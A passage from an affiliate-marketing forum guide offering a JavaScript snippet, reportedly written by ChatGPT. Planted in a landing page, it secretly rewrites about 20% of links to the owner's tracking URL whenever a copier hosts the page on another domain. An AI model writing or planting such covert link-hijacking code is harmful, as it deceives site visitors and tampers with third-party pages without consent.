• Welcome to affLIFT!
    We are happy you have decided to check out our awesome affiliate marketing forum. Register your account today to join our amazing community!
  • Are you looking for WW high-quality traffic? Join HilltopAds! Try POP’s, Video and In-Page push formats and get conversions. Apply promo code AFFLIFT10 and get 10% bonus on your first deposit!
    Join HilltopAds

Guide Steal Traffic on Stolen LPs (JavaScript Included)

Geozo

Luke

Admin
Staff Member
Community Leader
Joined
Apr 17, 2018
Messages
20,842
Do you consistently see others running your landing pages on Anstrex or AdPlexity? Tired of others stealing your LPs but not benefiting from it? Well, there is a way to steal back some of that traffic...

By placing simple JavaScript on your landing page (like you would for normal landing page scripts), you can steal back a percentage of the traffic that someone else is paying to send to your their landing page.

This is assuming of course that they do not remove your JavaScript and there are ways to improve your odds at that as well. But first, here's the simple JavaScript that ChatGPT created for me to do this:

JavaScript:
(function() {
     const currentDomain = window.location.hostname;
     const targetDomain =  "afflift.com";
    const yourLink  = "https://yourtrackinglink.com";
    const  probability = 0.20;

     if (currentDomain !== targetDomain) {
          document.addEventListener("DOMContentLoaded", function() {
              const links = document.querySelectorAll('a');
              links.forEach(link  => {
                  const  randomNum = Math.random();
                   if (randomNum < probability) {
                        link.href = yourLink;
                   }
              });
         });
     }
})();

Now, this is very basic and could be improved upon, but for the purposes of this guide I think it will be fine.

First, it checks the domain of the site the JavaScript is being loaded on (currentDomain). Then, it compares that to your landing page domain (targetDomain).
 
To view the premium content in our affiliate marketing forum (including this awesome thread), you must first register and upgrade your account. Register today and become a part of our amazing community!
Top